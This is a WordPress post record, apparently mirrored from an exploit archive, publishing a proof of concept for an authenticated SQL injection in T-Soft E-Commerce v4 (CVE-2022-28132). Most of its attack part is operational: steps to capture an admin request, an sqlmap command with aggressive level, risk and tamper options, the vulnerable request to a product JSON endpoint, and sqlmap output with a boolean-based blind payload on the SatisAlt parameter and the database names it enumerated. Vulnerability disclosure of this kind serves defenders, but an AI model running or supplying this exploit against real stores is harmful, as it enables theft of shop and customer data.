{"id":24585,"date":"2022-05-17T22:59:09","date_gmt":"2022-05-17T18:59:09","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/167192\/tsoftecomm4-sql.txt"},"modified":"2022-05-28T11:22:03","modified_gmt":"2022-05-28T06:52:03","slug":"t-soft-e-commerce-4-sql-injection","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/t-soft-e-commerce-4-sql-injection\/","title":{"rendered":"T-Soft E-Commerce 4 SQL Injection"},"content":{"rendered":"<p dir=\"ltr\"># Exploit Title: T-Soft E-Commerce 4 &#8211; SQLi (Authenticated)<br \/>\n# Exploit Author: Alperen Ergel<br \/>\n# Contact: @alpernae (IG\/TW)<br \/>\n# Software Homepage: https:\/\/www.tsoft.com.tr\/<br \/>\n# Version : v4<br \/>\n# Tested on: Kali Linux<br \/>\n# Category: WebApp<br \/>\n# Google Dork: N\/A<br \/>\n# CVE: 2022-28132<br \/>\n# Date: 18.02.2022<br \/>\n######## Description ###########################################<br \/>\n#<br \/>\n#<br \/>\n#<br \/>\n# Step-1: Login as Admin or with privilage user<br \/>\n# Step-2: Open burp or zap and request the {PoC REQUEST PATH} vulnerable path<br \/>\n# Step-3: Capture the request save as .txt<br \/>\n# Step-4: Run SQLMAP with this command &#8216;sqlmap -r {req.txt} &#8211;dbs &#8211;level 5 &#8211;risk 3 &#8211;tamper=space2comment&#8217; &#8211;random-agent&#8217;<br \/>\n# Step-5: Now you&#8217;re be able to see the dbs for more search &#8216;how to use sqlmap advance&#8217;<br \/>\n#<br \/>\n# Impact: Attacker can see the what have in database and it&#8217;s big impact and attacker can stole datas&#8230;<br \/>\n#<br \/>\n#<br \/>\n#<br \/>\n######## Proof of Concept ########################################<\/p>\n<p dir=\"ltr\">========&gt;&gt;&gt; REQUEST &lt;&lt;&lt;=========<\/p>\n<p dir=\"ltr\">GET \/Y\/Moduller\/_Urun\/Json.php?_dc=1646232925144&amp;sort=kayittarihi&amp;dir=DESC&amp;AramaKelimesi=&amp;AramaKriteri=UrunAdi&amp;SatisAlt=&amp;SatisUst=<br \/>\n&amp;marka=&amp;model=&amp;tedarikci=&amp;AlisAlt=&amp;AlisUst=&amp;KdvAlt=&amp;KdvUst=&amp;StokAlt=&amp;StokUst=&amp;birim=&amp;extra=&amp;kategori=&amp;Kategori=&amp;gor=0&amp;ind=0&amp;yeni=0&amp;karsila=0&amp;ana=0&amp;grup=&amp;firsat=0&amp;mercek=0&amp;kdvGoster=0&amp;filtre=0&amp;video=0&amp;xml_not_update_price=0&amp;xml_not_update_stock=0&amp;multi_category_sort=0&amp;simge=&amp;desiAlt=&amp;desiUst=&amp;agirlikAlt=&amp;agirlikUst=&amp;stokBirim=&amp;FirsatBaslamaTarihiBas=&amp;FirsatBaslamaTarihiSon=&amp;FirsatBitisTarihiBas=&amp;FirsatBitisTarihiSon=&amp;UrunEklemeTarihiBas=&amp;UrunEklemeTarihiSon=&amp;havaleAlt=&amp;havaleUst=&amp;page=1&amp;start=0&amp;limit=20 HTTP\/2<br \/>\nHost: domain.com<br \/>\nCookie: lang=tr; v4=on; nocache=1; TSOFT_USER=xxx@xx.com; customDashboardMapping=true; countryCode=TR; rest1SupportUser=0; nocache=1; yayinlanmaDurumuPopup=1; yayinlanmaDurumuPopupTimeout=864000; PHPSESSID=fcfa85a5603de7b64bc08eaf68bc51ca; U_TYPE_CK=131; U_TYPE_OK=c16a5320fa475530d9583c34fd356ef5; TSOFT_LOGGED=7d025a34d0526c8896d713159b0d1ffe; email=; phone=; password=<br \/>\nSec-Ch-Ua: &#8220;(Not(A:Brand&#8221;;v=&#8221;8&#8243;, &#8220;Chromium&#8221;;v=&#8221;98&#8243;<br \/>\nX-Requested-With: XMLHttpRequest<br \/>\nSec-Ch-Ua-Mobile: ?0<br \/>\nUser-Agent: Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/98.0.4758.102 Safari\/537.36<br \/>\nSec-Ch-Ua-Platform: &#8220;Linux&#8221;<br \/>\nAccept: *\/*<br \/>\nSec-Fetch-Site: same-origin<br \/>\nSec-Fetch-Mode: cors<br \/>\nSec-Fetch-Dest: empty<br \/>\nReferer: https:\/\/domain.com\/srv\/admin\/products\/products-v2\/index<br \/>\nAccept-Encoding: gzip, deflate<br \/>\nAccept-Language: en-US,en;q=0.9<\/p>\n<p dir=\"ltr\">=============&gt; RESULTS OF THE SQLMAP &lt;==========================<\/p>\n<p dir=\"ltr\">Parameter: SatisAlt (GET)<br \/>\nType: boolean-based blind<br \/>\nTitle: AND boolean-based blind &#8211; WHERE or HAVING clause<br \/>\nPayload: _dc=1646232925144&amp;sort=kayittarihi&amp;dir=DESC&amp;AramaKelimesi=&amp;AramaKriteri=UrunAdi&amp;SatisAlt=&#8217; AND 1331=1331 AND &#8216;RcAU&#8217;=&#8217;RcAU&amp;SatisUst=&amp;marka=&amp;model=&amp;tedarikci=&amp;AlisAlt=&amp;AlisUst=&amp;KdvAlt=&amp;KdvUst=&amp;StokAlt=&amp;StokUst=&amp;birim=&amp;extra=&amp;kategori=&amp;Kategori=&amp;gor=0&amp;ind=0&amp;yeni=0&amp;karsila=0&amp;ana=0&amp;grup=&amp;firsat=0&amp;mercek=0&amp;kdvGoster=0&amp;filtre=0&amp;video=0&amp;xml_not_update_price=0&amp;xml_not_update_stock=0&amp;multi_category_sort=0&amp;simge=&amp;desiAlt=&amp;desiUst=&amp;agirlikAlt=&amp;agirlikUst=&amp;stokBirim=&amp;FirsatBaslamaTarihiBas=&amp;FirsatBaslamaTarihiSon=&amp;FirsatBitisTarihiBas=&amp;FirsatBitisTarihiSon=&amp;UrunEklemeTarihiBas=&amp;UrunEklemeTarihiSon=&amp;havaleAlt=&amp;havaleUst=&amp;page=1&amp;start=0&amp;limit=20<br \/>\n&#8212;<br \/>\nback-end DBMS: MySQL 5<br \/>\navailable databases [2]:<br \/>\n[*] d25082_db<br \/>\n[*] information_schema<\/p>\n<p dir=\"ltr\">[13:05:31] [INFO] GET parameter &#8216;SatisAlt&#8217; appears to be &#8216;SQLite &gt; 2.0 OR time-based blind (heavy query)&#8217; injectable<\/p>\n","protected":false},"excerpt":{"rendered":"<p># Exploit Title: T-Soft E-Commerce 4 &#8211; SQLi (Authenticated) # Exploit Author: Alperen Ergel # Contact: @alpernae (IG\/TW) # Software Homepage: https:\/\/www.tsoft.com.tr\/ # Version : v4 # Tested on: Kali Linux # Category: WebApp # Google Dork: N\/A # CVE: 2022-28132 # Date: 18.02.2022 ######## Description ########################################### # # # # Step-1: Login as Admin &hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-24585","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/24585","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=24585"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/24585\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=24585"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=24585"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=24585"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}